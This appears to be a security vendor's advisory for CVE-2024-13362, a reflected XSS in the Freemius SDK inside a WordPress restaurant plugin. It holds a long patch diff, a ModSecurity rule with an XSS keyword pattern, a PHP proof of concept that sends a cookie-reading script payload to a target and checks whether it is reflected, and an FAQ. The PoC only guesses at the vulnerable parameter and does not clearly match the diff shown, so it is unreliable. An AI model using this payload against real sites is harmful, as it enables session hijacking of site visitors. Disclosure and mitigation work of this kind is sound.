+                $this->is_user_in_admin() &&
+                $this->is_parallel_activation() &&
+                $this->_premium_plugin_basename !== $this->_premium_plugin_basename_from_parallel_activation
+            ) {
+                $this->_premium_plugin_basename = $this->_premium_plugin_basename_from_parallel_activation;
+
+                register_activation_hook(
+                    dirname( $this->_plugin_dir_path ) . '/' . $this->_premium_plugin_basename,
+                    array( &$this, '_activate_plugin_event_hook' )
+                );
+            }
+        }
+
+        /**
+         * Determines if a plugin is running in parallel activation mode.
+         *
+         * @author Leo Fajardo (@leorw)
+         * @since 2.9.1
+         *
+         * @return bool
+         */
+        private function is_parallel_activation() {
+            return ! empty( $this->_premium_plugin_basename_from_parallel_activation );
         }

         /**
@@ -5155,11 +5186,35 @@
                 $this->_plugin :
                 new FS_Plugin();

+            $is_premium     = $this->get_bool_option( $plugin_info, 'is_premium', true );
             $premium_suffix = $this->get_option( $plugin_info, 'premium_suffix', '(Premium)' );

+            $module_type = $this->get_option( $plugin_info, 'type', $this->_module_type );
+
+            $parallel_activation = $this->get_option( $plugin_info, 'parallel_activation' );
+
+            if (
+                ! $is_premium &&
+                is_array( $parallel_activation ) &&
+                ( WP_FS__MODULE_TYPE_PLUGIN === $module_type ) &&
+                $this->get_bool_option( $parallel_activation, 'enabled' )
+            ) {
+                $premium_basename = $this->get_option( $parallel_activation, 'premium_version_basename' );
+
+                if ( empty( $premium_basename ) ) {
+                    throw new Exception('You need to specify the premium version basename to enable parallel version activation.');
+                }
+
+                $this->_premium_plugin_basename_from_parallel_activation = $premium_basename;
+
+                if ( is_plugin_active( $premium_basename ) ) {
+                    $is_premium = true;
+                }
+            }
+
             $plugin->update( array(
                 'id'                   => $id,
-                'type'                 => $this->get_option( $plugin_info, 'type', $this->_module_type ),
+                'type'                 => $module_type,
                 'public_key'           => $public_key,
                 'slug'                 => $this->_slug,
                 'premium_slug'         => $this->get_option( $plugin_info, 'premium_slug', "{$this->_slug}-premium" ),
@@ -5167,7 +5222,7 @@
                 'version'              => $this->get_plugin_version(),
                 'title'                => $this->get_plugin_name( $premium_suffix ),
                 'file'                 => $this->_plugin_basename,
-                'is_premium'           => $this->get_bool_option( $plugin_info, 'is_premium', true ),
+                'is_premium'           => $is_premium,
                 'premium_suffix'       => $premium_suffix,
                 'is_live'              => $this->get_bool_option( $plugin_info, 'is_live', true ),
                 'affiliate_moderation' => $this->get_option( $plugin_info, 'has_affiliation' ),
@@ -5236,7 +5291,14 @@
                 $this->_anonymous_mode   = false;
             } else {
                 $this->_enable_anonymous = $this->get_bool_option( $plugin_info, 'enable_anonymous', true );
-                $this->_anonymous_mode   = $this->get_bool_option( $plugin_info, 'anonymous_mode', false );
+                $this->_anonymous_mode   = (
+                    $this->get_bool_option( $plugin_info, 'anonymous_mode', false ) ||
+                    (
+                        $this->apply_filters( 'playground_anonymous_mode', true ) &&
+                        ! empty( $_SERVER['HTTP_HOST'] ) &&
+                        FS_Site::is_playground_wp_environment_by_host( $_SERVER['HTTP_HOST'] )
+                    )
+                );
             }
             $this->_permissions = $this->get_option( $plugin_info, 'permissions', array() );
             $this->_is_bundle_license_auto_activation_enabled = $this->get_option( $plugin_info, 'bundle_license_auto_activation', false );
@@ -5444,7 +5506,7 @@

             if ( $this->is_registered() ) {
                 // Schedule code type changes event.
-                $this->schedule_install_sync();
+                $this->maybe_schedule_install_sync_cron();
             }

             /**
@@ -6508,6 +6570,33 @@
         }

         /**
+         * Instead of running blocking install sync event, execute non blocking scheduled cron job.
+         *
+         * @param int $except_blog_id Since 2.0.0 when running in a multisite network environment, the cron execution is consolidated. This param allows excluding specified blog ID from being the cron job executor.
+         *
+         * @author Leo Fajardo (@leorw)
+         * @since  2.9.1
+         */
+        private function maybe_schedule_install_sync_cron( $except_blog_id = 0 ) {
+            if ( ! $this->is_user_in_admin() ) {
+                return;
+            }
+
+            if ( $this->is_clone() ) {
+                return;
+            }
+
+            if (
+                // The event has been properly scheduled, so no need to reschedule it.
+                is_numeric( $this->next_install_sync() )
+            ) {
+                return;
+            }
+
+            $this->schedule_cron( 'install_sync', 'install_sync', 'single', WP_FS__SCRIPT_START_TIME, false, $except_blog_id );
+        }
+
+        /**
          * @author Vova Feldman (@svovaf)
          * @since  1.1.7.3
          *
@@ -6605,22 +6694,6 @@
         }

         /**
-         * Instead of running blocking install sync event, execute non blocking scheduled wp-cron.
-         *
-         * @author Vova Feldman (@svovaf)
-         * @since  1.1.7.3
-         *
-         * @param int $except_blog_id Since 2.0.0 when running in a multisite network environment, the cron execution is consolidated. This param allows excluding excluded specified blog ID from being the cron executor.
-         */
-        private function schedule_install_sync( $except_blog_id = 0 ) {
-            if ( $this->is_clone() ) {
-                return;
-            }
-
-            $this->schedule_cron( 'install_sync', 'install_sync', 'single', WP_FS__SCRIPT_START_TIME, false, $except_blog_id );
-        }
-
-        /**
          * Unix timestamp for previous install sync cron execution or false if never executed.
          *
          * @todo   There's some very strange bug that $this->_storage->install_sync_timestamp value is not being updated. But for sure the sync event is working.
@@ -7411,7 +7484,7 @@
                  */
                 if (
                     is_plugin_active( $other_version_basename ) &&
-                    $this->apply_filters( 'deactivate_on_activation', true )
+                    $this->apply_filters( 'deactivate_on_activation', ! $this->is_parallel_activation() )
                 ) {
                     deactivate_plugins( $other_version_basename );
                 }
@@ -7425,7 +7498,7 @@

                 // Schedule re-activation event and sync.
 //				$this->sync_install( array(), true );
-                $this->schedule_install_sync();
+                $this->maybe_schedule_install_sync_cron();

                 // If activating the premium module version, add an admin notice to congratulate for an upgrade completion.
                 if ( $is_premium_version_activation ) {
@@ -8616,7 +8689,7 @@
                 return;
             }

-            $this->schedule_install_sync();
+            $this->maybe_schedule_install_sync_cron();
 //			$this->sync_install( array(), true );
         }

@@ -15974,7 +16047,7 @@
             if ( $this->is_install_sync_scheduled() &&
                  $context_blog_id == $this->get_install_sync_cron_blog_id()
             ) {
-                $this->schedule_install_sync( $context_blog_id );
+                $this->maybe_schedule_install_sync_cron( $context_blog_id );
             }
         }

@@ -23927,13 +24000,15 @@

             // Start trial button.
             $button = ' ' . sprintf(
-                    '<a style="margin-left: 10px; vertical-align: super;" href="%s"><button class="button button-primary">%s  ➜</button></a>',
+                    '<div><a class="button button-primary" href="%s">%s  ➜</a></div>',
                     $trial_url,
                     $this->get_text_x_inline( 'Start free trial', 'call to action', 'start-free-trial' )
                 );

+            $message_text = $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string}" );
+
             $this->_admin_notices->add_sticky(
-                $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string} {$button}" ),
+                "<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>",
                 'trial_promotion',
                 '',
                 'promotion'
@@ -25403,7 +25478,7 @@
                 $img_dir = WP_FS__DIR_IMG;

                 // Locate the main assets folder.
-                if ( 1 < count( $fs_active_plugins->plugins ) ) {
+                if ( ! empty( $fs_active_plugins->plugins ) ) {
                     $plugin_or_theme_img_dir = ( $this->is_plugin() ? WP_PLUGIN_DIR : get_theme_root( get_stylesheet() ) );

                     foreach ( $fs_active_plugins->plugins as $sdk_path => &$data ) {
--- a/restaurant-cafe-addon-for-elementor/freemius/includes/class-fs-plugin-updater.php
+++ b/restaurant-cafe-addon-for-elementor/freemius/includes/class-fs-plugin-updater.php
@@ -542,24 +542,8 @@

             global $wp_current_filter;

-            $current_plugin_version = $this->_fs->get_plugin_version();
-
-            if ( ! empty( $wp_current_filter ) && 'upgrader_process_complete' === $wp_current_filter[0] ) {
-                if (
-                    is_null( $this->_update_details ) ||
-                    ( is_object( $this->_update_details ) && $this->_update_details->new_version !== $current_plugin_version )
-                ) {
-                    /**
-                     * After an update, clear the stored update details and reparse the plugin's main file in order to get
-                     * the updated version's information and prevent the previous update information from showing up on the
-                     * updates page.
-                     *
-                     * @author Leo Fajardo (@leorw)
-                     * @since 2.3.1
-                     */
-                    $this->_update_details  = null;
-                    $current_plugin_version = $this->_fs->get_plugin_version( true );
-                }
+            if ( ! empty( $wp_current_filter ) && in_array( 'upgrader_process_complete', $wp_current_filter ) ) {
+                return $transient_data;
             }

             if ( ! isset( $this->_update_details ) ) {
@@ -568,7 +552,7 @@
                     false,
                     fs_request_get_bool( 'force-check' ),
                     FS_Plugin_Updater::UPDATES_CHECK_CACHE_EXPIRATION,
-                    $current_plugin_version
+                    $this->_fs->get_plugin_version()
                 );

                 $this->_update_details = false;
--- a/restaurant-cafe-addon-for-elementor/freemius/includes/entities/class-fs-plugin-plan.php
+++ b/restaurant-cafe-addon-for-elementor/freemius/includes/entities/class-fs-plugin-plan.php
@@ -13,7 +13,6 @@
 	/**
 	 * Class FS_Plugin_Plan
 	 *
-	 * @property FS_Pricing[] $pricing
 	 */
 	class FS_Plugin_Plan extends FS_Entity {

--- a/restaurant-cafe-addon-for-elementor/freemius/includes/entities/class-fs-site.php
+++ b/restaurant-cafe-addon-for-elementor/freemius/includes/entities/class-fs-site.php
@@ -10,16 +10,16 @@
         exit;
     }

-    /**
-     * @property int $blog_id
-     */
-    #[AllowDynamicProperties]
     class FS_Site extends FS_Scope_Entity {
         /**
          * @var number
          */
         public $site_id;
         /**
+         * @var int
+         */
+        public $blog_id;
+        /**
          * @var number
          */
         public $plugin_id;
@@ -190,7 +190,7 @@
                 fs_ends_with( $subdomain, '.cloudwaysapps.com' ) ||
                 // Kinsta
                 (
-                    ( fs_starts_with( $subdomain, 'staging-' ) || fs_starts_with( $subdomain, 'env-' ) ) &&
+                    ( fs_starts_with( $subdomain, 'stg-' ) ||  fs_starts_with( $subdomain, 'staging-' ) || fs_starts_with( $subdomain, 'env-' ) ) &&
                     ( fs_ends_with( $subdomain, '.kinsta.com' ) || fs_ends_with( $subdomain, '.kinsta.cloud' ) )
                 ) ||
                 // DesktopServer
@@ -208,6 +208,40 @@
             );
         }

+        /**
+         * @author Leo Fajardo (@leorw)
+         * @since  2.9.1
+         *
+         * @param string $host
+         *
+         * @return bool
+         */
+        static function is_playground_wp_environment_by_host( $host ) {
+            // Services aimed at providing a WordPress sandbox environment.
+            $sandbox_wp_environment_domains = array(
+                // InstaWP
+                'instawp.xyz',
+
+                // TasteWP
+                'tastewp.com',
+
+                // WordPress Playground
+                'playground.wordpress.net',
+            );
+
+            foreach ( $sandbox_wp_environment_domains as $domain) {
+                if (
+                    ( $host === $domain ) ||
+                    fs_ends_with( $host, '.' . $domain ) ||
+                    fs_ends_with( $host, '-' . $domain )
+                ) {
+                    return true;
+                }
+            }
+
+            return false;
+        }
+
         function is_localhost() {
             return ( WP_FS__IS_LOCALHOST_FOR_SERVER || self::is_localhost_by_address( $this->url ) );
         }
--- a/restaurant-cafe-addon-for-elementor/freemius/includes/entities/class-fs-user.php
+++ b/restaurant-cafe-addon-for-elementor/freemius/includes/entities/class-fs-user.php
@@ -48,6 +48,19 @@
 			parent::__construct( $user );
 		}

+		/**
+		 * This method removes the deprecated 'is_beta' property from the serialized data.
+		 * Should clean up the serialized data to avoid PHP 8.2 warning on next execution.
+		 *
+		 * @return void
+		 */
+		function __wakeup() {
+			if ( property_exists( $this, 'is_beta' ) ) {
+				// If we enter here, and we are running PHP 8.2, we already had the warning. But we sanitize data for next execution.
+				unset( $this->is_beta );
+			}
+		}
+
 		function get_name() {
 			return trim( ucfirst( trim( is_string( $this->first ) ? $this->first : '' ) ) . ' ' . ucfirst( trim( is_string( $this->last ) ? $this->last : '' ) ) );
 		}
--- a/restaurant-cafe-addon-for-elementor/freemius/includes/managers/class-fs-admin-menu-manager.php
+++ b/restaurant-cafe-addon-for-elementor/freemius/includes/managers/class-fs-admin-menu-manager.php
@@ -699,16 +699,36 @@
 				$menu = $this->find_main_submenu();
 			}

+			$menu_slug   = $menu['menu'][2];
 			$parent_slug = isset( $menu['parent_slug'] ) ?
-                $menu['parent_slug'] :
-                'admin.php';
+				$menu['parent_slug'] :
+				'admin.php';

-            return admin_url(
-                $parent_slug .
-                ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
-                'page=' .
-                $menu['menu'][2]
-            );
+			if ( fs_apply_filter( $this->_module_unique_affix, 'enable_cpt_advanced_menu_logic', false ) ) {
+				$parent_slug = 'admin.php';
+
+				/**
+				 * This line and the `if` block below it are based on the `menu_page_url()` function of WordPress.
+				 *
+				 * @author Leo Fajardo (@leorw)
+				 * @since 2.10.2
+				 */
+				global $_parent_pages;
+
+				if ( ! empty( $_parent_pages[ $menu_slug ] ) ) {
+					$_parent_slug = $_parent_pages[ $menu_slug ];
+					$parent_slug  = isset( $_parent_pages[ $_parent_slug ] ) ?
+						$parent_slug :
+						$menu['parent_slug'];
+				}
+			}
+
+			return admin_url(
+				$parent_slug .
+				( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
+				'page=' .
+				$menu_slug
+			);
 		}

 		/**
--- a/restaurant-cafe-addon-for-elementor/freemius/includes/managers/class-fs-admin-notice-manager.php
+++ b/restaurant-cafe-addon-for-elementor/freemius/includes/managers/class-fs-admin-notice-manager.php
@@ -194,8 +194,14 @@
          * @since  1.0.7
          */
         static function _add_sticky_dismiss_javascript() {
+            $sticky_admin_notice_js_template_name = 'sticky-admin-notice-js.php';
+
+            if ( ! file_exists( fs_get_template_path( $sticky_admin_notice_js_template_name ) ) ) {
+                return;
+            }
+
             $params = array();
-            fs_require_once_template( 'sticky-admin-notice-js.php', $params );
+            fs_require_once_template( $sticky_admin_notice_js_template_name, $params );
         }

         private static $_added_sticky_javascript = false;
--- a/restaurant-cafe-addon-for-elementor/freemius/start.php
+++ b/restaurant-cafe-addon-for-elementor/freemius/start.php
@@ -15,7 +15,7 @@
 	 *
 	 * @var string
 	 */
-	$this_sdk_version = '2.9.0';
+	$this_sdk_version = '2.11.0';

 	#region SDK Selection Logic --------------------------------------------------------------------

@@ -36,7 +36,16 @@
 		require_once dirname( __FILE__ ) . '/includes/fs-essential-functions.php';
 	}

-	/**
+    /**
+     * We updated the logic to support SDK loading from a subfolder of a theme as well as from a parent theme
+     * If the SDK is found in the active theme, it sets the relative path accordingly.
+     * If not, it checks the parent theme and sets the relative path if found there.
+     * This allows the SDK to be loaded from composer dependencies or from a custom `vendor/freemius` folder.
+     *
+     * @author Daniele Alessandra (@DanieleAlessandra)
+     * @since  2.9.0.5
+     *
+     *
 	 * This complex logic fixes symlink issues (e.g. with Vargant). The logic assumes
 	 * that if it's a file from an SDK running in a theme, the location of the SDK
 	 * is in the main theme's folder.
@@ -83,16 +92,50 @@
      */
 	$themes_directory         = get_theme_root( get_stylesheet() );
 	$themes_directory_name    = basename( $themes_directory );
-	$theme_candidate_basename = basename( dirname( $fs_root_path ) ) . '/' . basename( $fs_root_path );

-	if ( $file_path == fs_normalize_path( realpath( trailingslashit( $themes_directory ) . $theme_candidate_basename . '/' . basename( $file_path ) ) )
-	) {
-		$this_sdk_relative_path = '../' . $themes_directory_name . '/' . $theme_candidate_basename;
-		$is_theme               = true;
-	} else {
-		$this_sdk_relative_path = plugin_basename( $fs_root_path );
-		$is_theme               = false;
-	}
+    // This change ensures that the condition works even if the SDK is located in a subdirectory (e.g., vendor)
+    $theme_candidate_sdk_basename = str_replace( $themes_directory . '/' . get_stylesheet() . '/', '', $fs_root_path );
+
+    // Check if the current file is part of the active theme.
+    $is_current_sdk_from_active_theme = $file_path == $themes_directory . '/' . get_stylesheet() . '/' . $theme_candidate_sdk_basename . '/' . basename( $file_path );
+    $is_current_sdk_from_parent_theme = false;
+
+    // Check if the current file is part of the parent theme.
+    if ( ! $is_current_sdk_from_active_theme ) {
+        $theme_candidate_sdk_basename     = str_replace( $themes_directory . '/' . get_template() . '/',
+            '',
+            $fs_root_path );
+        $is_current_sdk_from_parent_theme = $file_path == $themes_directory . '/' . get_template() . '/' . $theme_candidate_sdk_basename . '/' . basename( $file_path );
+    }
+
+    $theme_name = null;
+    if ( $is_current_sdk_from_active_theme ) {
+        $theme_name             = get_stylesheet();
+        $this_sdk_relative_path = '../' . $themes_directory_name . '/' . $theme_name . '/' . $theme_candidate_sdk_basename;
+        $is_theme               = true;
+    } else if ( $is_current_sdk_from_parent_theme ) {
+        $theme_name             = get_template();
+        $this_sdk_relative_path = '../' . $themes_directory_name . '/' . $theme_name . '/' . $theme_candidate_sdk_basename;
+        $is_theme               = true;
+    } else {
+        $this_sdk_relative_path = plugin_basename( $fs_root_path );
+        $is_theme               = false;
+
+        /**
+         * If this file was included from another plugin with lower SDK version, and if this plugin is symlinked, then we need to get the actual plugin path,
+         * as the value right now will be wrong, it will only remove the directory separator from the file_path.
+         *
+         * The check of `fs_find_direct_caller_plugin_file` determines that this file was indeed included by a different plugin than the main plugin.
+         */
+        if ( DIRECTORY_SEPARATOR . $this_sdk_relative_path === $fs_root_path && function_exists( 'fs_find_direct_caller_plugin_file' ) ) {
+            $original_plugin_dir_name = dirname( fs_find_direct_caller_plugin_file( $file_path ) );
+
+            // Remove everything before the original plugin directory name.
+            $this_sdk_relative_path = substr( $this_sdk_relative_path, strpos( $this_sdk_relative_path, $original_plugin_dir_name ) );
+
+            unset( $original_plugin_dir_name );
+        }
+    }

 	if ( ! isset( $fs_active_plugins ) ) {
 		// Load all Freemius powered active plugins.
@@ -176,7 +219,8 @@
 	     $this_sdk_version != $fs_active_plugins->plugins[ $this_sdk_relative_path ]->version
 	) {
 		if ( $is_theme ) {
-			$plugin_path = basename( dirname( $this_sdk_relative_path ) );
+            // Saving relative path and not only directory name as it could be a subfolder
+            $plugin_path = $theme_name;
 		} else {
 			$plugin_path = plugin_basename( fs_find_direct_caller_plugin_file( $file_path ) );
 		}
@@ -225,11 +269,23 @@

 		$is_newest_sdk_type_theme = ( isset( $fs_newest_sdk->type ) && 'theme' === $fs_newest_sdk->type );

-		if ( ! $is_newest_sdk_type_theme ) {
-			$is_newest_sdk_plugin_active = is_plugin_active( $fs_newest_sdk->plugin_path );
-		} else {
-			$current_theme               = wp_get_theme();
-			$is_newest_sdk_plugin_active = ( $current_theme->stylesheet === $fs_newest_sdk->plugin_path );
+        /**
+         * @var bool $is_newest_sdk_module_active
+         * True if the plugin with the newest SDK is active.
+         * True if the newest SDK is part of the current theme or current theme's parent.
+         * False otherwise.
+         */
+        if ( ! $is_newest_sdk_type_theme ) {
+            $is_newest_sdk_module_active = is_plugin_active( $fs_newest_sdk->plugin_path );
+        } else {
+            $current_theme = wp_get_theme();
+            // Detect if current theme is the one registered as newer SDK
+            $is_newest_sdk_module_active = (
+                strpos(
+                    $fs_newest_sdk->plugin_path,
+                    '../' . $themes_directory_name . '/' . $current_theme->get_stylesheet() . '/'
+                ) === 0
+            );

             $current_theme_parent = $current_theme->parent();

@@ -237,13 +293,19 @@
              * If the current theme is a child of the theme that has the newest SDK, this prevents a redirects loop
              * from happening by keeping the SDK info stored in the `fs_active_plugins` option.
              */
-            if ( ! $is_newest_sdk_plugin_active && $current_theme_parent instanceof WP_Theme ) {
-                $is_newest_sdk_plugin_active = ( $fs_newest_sdk->plugin_path === $current_theme_parent->stylesheet );
+            if ( ! $is_newest_sdk_module_active && $current_theme_parent instanceof WP_Theme ) {
+                // Detect if current theme parent is the one registered as newer SDK
+                $is_newest_sdk_module_active = (
+                    strpos(
+                        $fs_newest_sdk->plugin_path,
+                        '../' . $themes_directory_name . '/' . $current_theme_parent->get_stylesheet() . '/'
+                    ) === 0
+                );
             }
 		}

 		if ( $is_current_sdk_newest &&
-		     ! $is_newest_sdk_plugin_active &&
+		     ! $is_newest_sdk_module_active &&
 		     ! $fs_active_plugins->newest->in_activation
 		) {
 			// If current SDK is the newest and the plugin is NOT active, it means
@@ -262,14 +324,14 @@
 				. '/start.php' );
 		}

-		$is_newest_sdk_path_valid = ( $is_newest_sdk_plugin_active || $fs_active_plugins->newest->in_activation ) && file_exists( $sdk_starter_path );
+		$is_newest_sdk_path_valid = ( $is_newest_sdk_module_active || $fs_active_plugins->newest->in_activation ) && file_exists( $sdk_starter_path );

 		if ( ! $is_newest_sdk_path_valid && ! $is_current_sdk_newest ) {
 			// Plugin with newest SDK is no longer active, or SDK was moved to a different location.
 			unset( $fs_active_plugins->plugins[ $fs_active_plugins->newest->sdk_path ] );
 		}

-		if ( ! ( $is_newest_sdk_plugin_active || $fs_active_plugins->newest->in_activation ) ||
+		if ( ! ( $is_newest_sdk_module_active || $fs_active_plugins->newest->in_activation ) ||
 		     ! $is_newest_sdk_path_valid ||
 		     // Is newest SDK downgraded.
 		     ( $this_sdk_relative_path == $fs_active_plugins->newest->sdk_path &&
@@ -284,7 +346,7 @@
 			// Find the active plugin with the newest SDK version and update the newest reference.
 			fs_fallback_to_newest_active_sdk();
 		} else {
-			if ( $is_newest_sdk_plugin_active &&
+			if ( $is_newest_sdk_module_active &&
 			     $this_sdk_relative_path == $fs_active_plugins->newest->sdk_path &&
 			     ( $fs_active_plugins->newest->in_activation ||
 			       ( class_exists( 'Freemius' ) && ( ! defined( 'WP_FS__SDK_VERSION' ) || version_compare( WP_FS__SDK_VERSION, $this_sdk_version, '<' ) ) )
@@ -313,7 +375,7 @@
 		return;
 	}

-	if ( version_compare( $this_sdk_version, $fs_active_plugins->newest->version, '<' ) ) {
+	if ( isset( $fs_active_plugins->newest ) && version_compare( $this_sdk_version, $fs_active_plugins->newest->version, '<' ) ) {
 		$newest_sdk = $fs_active_plugins->plugins[ $fs_active_plugins->newest->sdk_path ];

 		$plugins_or_theme_dir_path = ( ! isset( $newest_sdk->type ) || 'theme' !== $newest_sdk->type ) ?
--- a/restaurant-cafe-addon-for-elementor/freemius/templates/forms/license-activation.php
+++ b/restaurant-cafe-addon-for-elementor/freemius/templates/forms/license-activation.php
@@ -569,7 +569,7 @@
 				        licenseKey = $otherLicenseKey.val();
                     } else {
 				        if ( ! hasLicensesDropdown ) {
-                            licenseID = $availableLicenseKey.data( 'id' );
+                            licenseID = $availableLicenseKey.data( 'id' ).toString();
                         } else {
                             licenseID = $licensesDropdown.val();
                         }
--- a/restaurant-cafe-addon-for-elementor/freemius/templates/pricing.php
+++ b/restaurant-cafe-addon-for-elementor/freemius/templates/pricing.php
@@ -69,6 +69,11 @@

     wp_enqueue_script( 'freemius-pricing', $pricing_js_url );

+    $pricing_css_path = $fs->apply_filters( 'pricing/css_path', null );
+    if ( is_string( $pricing_css_path ) ) {
+        wp_enqueue_style( 'freemius-pricing', fs_asset_url( $pricing_css_path ) );
+    }
+
 	$has_tabs = $fs->_add_tabs_before_content();

 	if ( $has_tabs ) {
@@ -95,6 +100,8 @@
             'unique_affix'           => $fs->get_unique_affix(),
             'show_annual_in_monthly' => $fs->apply_filters( 'pricing/show_annual_in_monthly', true ),
             'license'                => $fs->has_active_valid_license() ? $fs->_get_license() : null,
+            'plugin_icon'            => $fs->get_local_icon_url(),
+            'disable_single_package' => $fs->apply_filters( 'pricing/disable_single_package', false ),
         ), $query_params );

         wp_add_inline_script( 'freemius-pricing', 'Freemius.pricing.new( ' . json_encode( $pricing_config ) . ' )' );
--- a/restaurant-cafe-addon-for-elementor/restaurant-cafe-addon-for-elementor.php
+++ b/restaurant-cafe-addon-for-elementor/restaurant-cafe-addon-for-elementor.php
@@ -6,13 +6,13 @@
 Description: Restaurant & Cafe Addon for Elementor covers all the must-needed elements for creating a perfect Restaurant website using Elementor Page Builder. 50+ Unique & Basic Elementor widget covers all of the Restaurant elements.
 Author: NicheAddons
 Author URI: https://nicheaddons.com/
-Version: 1.5.8
+Version: 1.6.1
 Text Domain: restaurant-cafe-addon-for-elementor
 */
 include_once ABSPATH . 'wp-admin/includes/plugin.php';
 // Pro Codes
 /* PLUGIN SELF PATH */
-define( 'NAREP_VERSION', '1.5.6' );
+define( 'NAREP_VERSION', '1.6.1' );
 define( 'NAREP_URL', plugins_url( '/', __FILE__ ) );
 if ( !function_exists( 'rcafe_fs' ) ) {
     // Create a helper function for easy SDK access.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_FILENAME "@rx /wp-content/plugins/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-image-compare.php$" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS in Freemius SDK via image compare widget',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'attack-xss'"
SecRule ARGS|ARGS_POST "@rx <script|<img|onerror|onload|javascript:" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress site
$attacker_payload = '"><script>alert(document.cookie)</script>'; // XSS payload

// This PoC demonstrates how an unauthenticated attacker can trigger XSS via the url parameter
// The vulnerable code is in the Freemius SDK's handling of the 'url' parameter or any widget that echoes user input without escaping.

// Step 1: Extract a valid nonce or find an endpoint that does not require authentication
// Since the vulnerability does not require authentication, we target a publicly accessible page.

// Step 2: Craft a URL that loads a widget with an XSS payload in a vulnerable attribute
// We target the image compare widget as an example, but any vulnerable parameter works.
// The payload is injected into the data-compare-style attribute (or similar).

$exploit_url = $target_url . '/?p=1&compare_style=' . urlencode($attacker_payload);

// Step 3: Output the exploit URL for manual testing
// The victim must be tricked into clicking this URL.
echo "[+] CVE-2024-13362 Exploit URL:n";
echo $exploit_url . "nn";

// Step 4: Automatically test if the target is vulnerable
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check if the payload appears in the response (unescaped)
if (strpos($response, $attacker_payload) !== false) {
    echo "[+] Target is VULNERABLE! Payload reflected in response.n";
} else {
    echo "[-] Target may be patched or not vulnerable. Payload not reflected.n";
}

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK and the Restaurant Cafe Addon for Elementor plugin. It allows unauthenticated attackers to inject malicious scripts via crafted URL parameters due to insufficient input sanitization.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Restaurant Cafe Addon for Elementor plugin version 1.5.8 or earlier is affected. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Restaurant Cafe Addon for Elementor plugin. If it is version 1.5.8 or earlier, your site is at risk. Additionally, review your site’s code for the presence of the vulnerable input handling.
How can I fix or mitigate this issue?
Recommended actions
To fix this vulnerability, update the Restaurant Cafe Addon for Elementor plugin to version 1.6.1 or later, which includes the necessary patches. Additionally, ensure that all user input is properly sanitized and escaped in your code.
What does the CVSS score of 6.1 indicate?
Understanding severity levels
The CVSS score of 6.1 indicates a medium severity level for this vulnerability. This means it requires user interaction to exploit, but the potential impact can still be significant if a user is tricked into clicking a malicious link.
How does the proof of concept demonstrate the vulnerability?
Explaining the PoC
The proof of concept shows how an attacker can craft a URL that exploits the vulnerability by injecting a malicious script into a data attribute. This script executes when a user visits the vulnerable page, demonstrating the risk of XSS attacks.
What are the potential risks of this vulnerability?
Impact on affected sites
Successful exploitation of this vulnerability can lead to session hijacking, phishing attacks, or defacement of the site. Attackers can execute arbitrary JavaScript in the context of the user’s browser, which can compromise sensitive information.
What is reflected XSS?
Understanding the attack type
Reflected XSS occurs when an attacker injects a script into a URL that is then reflected off a web server. This type of attack requires the victim to click on a malicious link, making it dependent on social engineering.
What measures can I take to prevent future vulnerabilities?
Best practices for security
To prevent future vulnerabilities, regularly update all plugins and themes, implement security best practices such as input validation and output escaping, and conduct regular security audits of your WordPress site.
How does this vulnerability relate to the Freemius SDK?
Connection to the SDK
The vulnerability is tied to the Freemius SDK in that it improperly handles user input through URL parameters. This allows for the injection of scripts into the page, particularly in widgets that utilize the SDK.
Is this vulnerability easy to exploit?
Assessing exploitation difficulty
While the exploitation requires user interaction, the lack of authentication makes it easier for attackers to target users. Crafting a malicious URL is straightforward, which increases the risk of successful exploitation.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the affected plugin until it can be updated. Additionally, educate users about the risks of clicking on unknown links and monitor site traffic for suspicious activity.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations